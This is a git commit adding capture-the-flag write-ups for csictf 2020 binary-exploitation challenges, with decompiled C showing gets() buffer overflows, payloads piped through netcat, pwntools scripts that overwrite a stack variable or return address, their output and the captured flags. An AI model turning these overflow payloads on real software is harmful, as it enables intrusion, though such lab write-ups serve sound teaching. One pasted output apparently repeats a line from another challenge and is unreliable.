rishitsaiya
4 years ago
11 changed files with 297 additions and 0 deletions
@ -0,0 +1,10 @@ |
|||
## Global Warming |
|||
The main idea finding the flag is `%n` exploit. |
|||
|
|||
#### Step-1: |
|||
|
|||
https://github.com/crypt0n1te/Write-Ups/blob/master/csictf-2020/pwn/global-warming.md |
|||
|
|||
#### Step-5: |
|||
Finally the flag becomes: |
|||
`csictf{n0_5tr1ng5_@tt@ch3d}` |
@ -0,0 +1,84 @@ |
|||
## Secret Society |
|||
The main idea finding the flag is Buffer Overflow. |
|||
|
|||
#### Step-1: |
|||
After I downloaded `secret-society`, I reversed it with IDA, I got this source code: |
|||
|
|||
**main()** function: |
|||
```c |
|||
undefined8 main(void) |
|||
{ |
|||
size_t sVar1; |
|||
undefined8 local_d8 [2]; |
|||
undefined4 uStack200; |
|||
undefined auStack196 [108]; |
|||
char local_58 [56]; |
|||
FILE *local_20; |
|||
char *local_18; |
|||
__gid_t local_c; |
|||
|
|||
setvbuf(stdout,(char *)0x0,2,0); |
|||
local_c = getegid(); |
|||
setresgid(local_c,local_c,local_c); |
|||
memset(local_58,0,0x32); |
|||
memset(local_d8,0,0x80); |
|||
puts("What is the secret phrase?"); |
|||
fgets((char *)local_d8,0x80,stdin); |
|||
local_18 = strchr((char *)local_d8,10); |
|||
if (local_18 != (char *)0x0) { |
|||
*local_18 = '\0'; |
|||
} |
|||
sVar1 = strlen((char *)local_d8); |
|||
*(undefined8 *)((long)local_d8 + sVar1) = 0x657261206577202c; |
|||
*(undefined8 *)((long)local_d8 + sVar1 + 8) = 0x6877797265766520; |
|||
*(undefined4 *)((long)&uStack200 + sVar1) = 0x2e657265; |
|||
auStack196[sVar1] = 0; |
|||
local_20 = fopen("flag.txt","r"); |
|||
if (local_20 == (FILE *)0x0) { |
|||
printf("You are a double agent, it\'s game over for you."); |
|||
/* WARNING: Subroutine does not return */ |
|||
exit(0); |
|||
} |
|||
fgets(local_58,0x32,local_20); |
|||
printf("Shhh... don\'t tell anyone else about "); |
|||
puts((char *)local_d8); |
|||
return 0; |
|||
} |
|||
|
|||
``` |
|||
|
|||
#### Step-2: |
|||
So, basically I had to overflow 3 buffers in above code `local_d8 (16 bytes, our input buffer)`, `uStack200 (4 bytes)` & `auStack196 (108 bytes)` |
|||
|
|||
So I tried using Debugger to get the address of the flag. |
|||
|
|||
|
|||
```bash |
|||
echo flag > flag.txt |
|||
perl -e 'print "A"x16 . "B"x4 . "C"x108' | ./secret-society |
|||
``` |
|||
|
|||
I got this output: |
|||
|
|||
```bash |
|||
What is the secret phrase? |
|||
Shhh... don't tell anyone else about AAAAAAAAAAAAAAAABBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC,flag |
|||
``` |
|||
|
|||
#### Step-3: |
|||
So, we just have to run this remotely on the web server. |
|||
|
|||
```bash |
|||
perl -e 'print "A"x16 . "B"x4 . "C"x108' | nc chall.csivit.com 30041 |
|||
``` |
|||
I got this output: |
|||
|
|||
```bash |
|||
What is the secret phrase? |
|||
Shhh... don't tell anyone else about AAAAAAAAAAAAAAAABBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC,csivit{Bu!!er_e3pl01ts_ar5_5asy} |
|||
``` |
|||
Voila! I got the flag there. |
|||
|
|||
#### Step-4: |
|||
Finally the flag becomes: |
|||
`csivit{Bu!!er_e3pl01ts_ar5_5asy}` |
@ -0,0 +1 @@ |
|||
flag |
Binary file not shown.
@ -0,0 +1,53 @@ |
|||
## pwn intended 0x1 |
|||
The main idea finding the flag is Buffer Overflow. |
|||
|
|||
#### Step-1: |
|||
I reversed the file with Ghidra. |
|||
|
|||
```c |
|||
undefined8 main(void) |
|||
|
|||
{ |
|||
char local_38 [44]; |
|||
int local_c; |
|||
|
|||
local_c = 0; |
|||
setbuf(stdout,(char *)0x0); |
|||
setbuf(stdin,(char *)0x0); |
|||
setbuf(stderr,(char *)0x0); |
|||
puts("Please pour me some coffee:"); |
|||
gets(local_38); |
|||
puts("\nThanks!\n"); |
|||
if (local_c != 0) { |
|||
puts("Oh no, you spilled some coffee on the floor! Use the flag to clean it."); |
|||
system("cat flag.txt"); |
|||
} |
|||
return 0; |
|||
} |
|||
``` |
|||
|
|||
#### Step-2: |
|||
Clearly, this was a case for Buffer Overflow. |
|||
|
|||
A simple command to overflow the buffer would give us the flag. |
|||
|
|||
`python -c 'print"A"*45' | nc chall.csivit.com 30001` |
|||
|
|||
<i> The piping done other way round doesn't help though. </i> |
|||
|
|||
Output: |
|||
|
|||
```bash |
|||
Please pour me some coffee: |
|||
|
|||
Thanks! |
|||
|
|||
Oh no, you spilled some coffee on the floor! Use the flag to clean it. |
|||
csictf{y0u_ov3rfl0w3d_th@t_c0ff33_l1ke_@_buff3r} |
|||
``` |
|||
|
|||
Voila! There we have our flag. |
|||
|
|||
#### Step-3: |
|||
Finally the flag becomes: |
|||
`csictf{y0u_ov3rfl0w3d_th@t_c0ff33_l1ke_@_buff3r}` |
Binary file not shown.
@ -0,0 +1,63 @@ |
|||
## pwn-intended-0x2 |
|||
The main idea finding the flag is overwrite the correct hex after padding. |
|||
|
|||
#### Step-1: |
|||
After I downloaded `pwn-intended-0x2`, I reversed it with IDA, I got this source code: |
|||
|
|||
```c |
|||
undefined8 main(void) |
|||
|
|||
{ |
|||
char local_38 [44]; |
|||
int local_c; |
|||
|
|||
local_c = 0; |
|||
setbuf(stdout,(char *)0x0); |
|||
setbuf(stdin,(char *)0x0); |
|||
setbuf(stderr,(char *)0x0); |
|||
puts("Welcome to csictf! Where are you headed?"); |
|||
gets(local_38); |
|||
puts("Safe Journey!"); |
|||
if (local_c == -0x35014542) { |
|||
puts("You\'ve reached your destination, here\'s a flag!"); |
|||
system("/bin/cat flag.txt"); |
|||
} |
|||
return 0; |
|||
} |
|||
``` |
|||
|
|||
#### Step-2: |
|||
`local_c` is checked for a hex value of `0xcafebabe`. Since the size of local array is 44, we have to write `0xcafebabe` after 44 bytes. |
|||
|
|||
#### Step-3: |
|||
I wrote a very common `rev_exploit.py` to pwn into the machine. |
|||
|
|||
```python |
|||
import pwn |
|||
|
|||
r = pwn.remote('chall.csivit.com', 30007) |
|||
|
|||
payload = "A"*44 + '\xbe\xba\xfe\xca' |
|||
|
|||
r.sendline(payload) |
|||
r.interactive() |
|||
``` |
|||
|
|||
#### Step-4: |
|||
When I finally ran this `python3 rev_exploit.py`, I got this output: |
|||
|
|||
```bash |
|||
[+] Opening connection to chall.csivit.com on port 30007: Done |
|||
[*] Switching to interactive mode |
|||
Welcome to csictf! Where are you headed? |
|||
Safe Journey! |
|||
You've reached your destination, here's a flag! |
|||
csictf{c4n_y0u_re4lly_telep0rt?}[*] Got EOF while reading in interactive |
|||
$ |
|||
[*] Interrupted |
|||
``` |
|||
Voila! I got the flag there. |
|||
|
|||
#### Step-5: |
|||
Finally the flag becomes: |
|||
`csictf{c4n_y0u_re4lly_telep0rt?}` |
Binary file not shown.
@ -0,0 +1,10 @@ |
|||
#!/usr/bin/env python3 |
|||
|
|||
import pwn |
|||
|
|||
r = pwn.remote('chall.csivit.com', 30007) |
|||
|
|||
payload = "A"*44 + '\xbe\xba\xfe\xca' |
|||
|
|||
r.sendline(payload) |
|||
r.interactive() |
@ -0,0 +1,76 @@ |
|||
## pwn-intended-0x3 |
|||
The main idea finding the flag is overwrite the correct hex after padding. |
|||
|
|||
#### Step-1: |
|||
After I downloaded `pwn-intended-0x3`, I reversed it with IDA, I got this source code: |
|||
|
|||
**main()** function: |
|||
```c |
|||
undefined8 main(void) |
|||
|
|||
{ |
|||
char local_28 [32]; |
|||
|
|||
setbuf(stdout,(char *)0x0); |
|||
setbuf(stdin,(char *)0x0); |
|||
setbuf(stderr,(char *)0x0); |
|||
puts("Welcome to csictf! Time to teleport again."); |
|||
gets(local_28); |
|||
return 0; |
|||
} |
|||
``` |
|||
|
|||
**flag()** function: |
|||
```c |
|||
void flag(void) |
|||
|
|||
{ |
|||
puts("Well, that was quick. Here\'s your flag:"); |
|||
system("cat flag.txt"); |
|||
/* WARNING: Subroutine does not return */ |
|||
exit(0); |
|||
} |
|||
``` |
|||
|
|||
#### Step-2: |
|||
I just had to write the address of the flag function after 32+8 bytes. |
|||
|
|||
So I tried using Debugger to get the address of the flag. |
|||
|
|||
```bash |
|||
echo into functions | gdb ./pwn-intended-0x3 | grep flag |
|||
``` |
|||
I got this output: `0x00000000004011ce flag` |
|||
|
|||
#### Step-3: |
|||
I wrote a very common `rev_exploit.py` to pwn into the machine. |
|||
|
|||
```python |
|||
import pwn |
|||
|
|||
r = pwn.remote('chall.csivit.com', 30013) |
|||
|
|||
payload = "A"*40 + '\xce\x11@\x00\x00\x00\x00\x00' |
|||
|
|||
r.sendline(payload) |
|||
r.interactive() |
|||
``` |
|||
|
|||
#### Step-4: |
|||
When I finally ran this `python3 rev_exploit.py`, I got this output: |
|||
|
|||
```bash |
|||
[+] Opening connection to chall.csivit.com on port 30013: Done |
|||
[*] Switching to interactive mode |
|||
Welcome to csictf! Time to teleport again. |
|||
Well, that was quick. Here's your flag: |
|||
You've reached your destination, here's a flag! |
|||
csictf{ch4lleng1ng_th3_v3ry_l4ws_0f_phys1cs}[*] Got EOF while reading in interactive |
|||
$ |
|||
[*] Interrupted |
|||
``` |
|||
Voila! I got the flag there. |
|||
|
|||
#### Step-5: |
|||
Finally the flag becomes: |
|||
`csictf{ch4lleng1ng_th3_v3ry_l4ws_0f_phys1cs}` |
Binary file not shown.
Loading…
Reference in new issue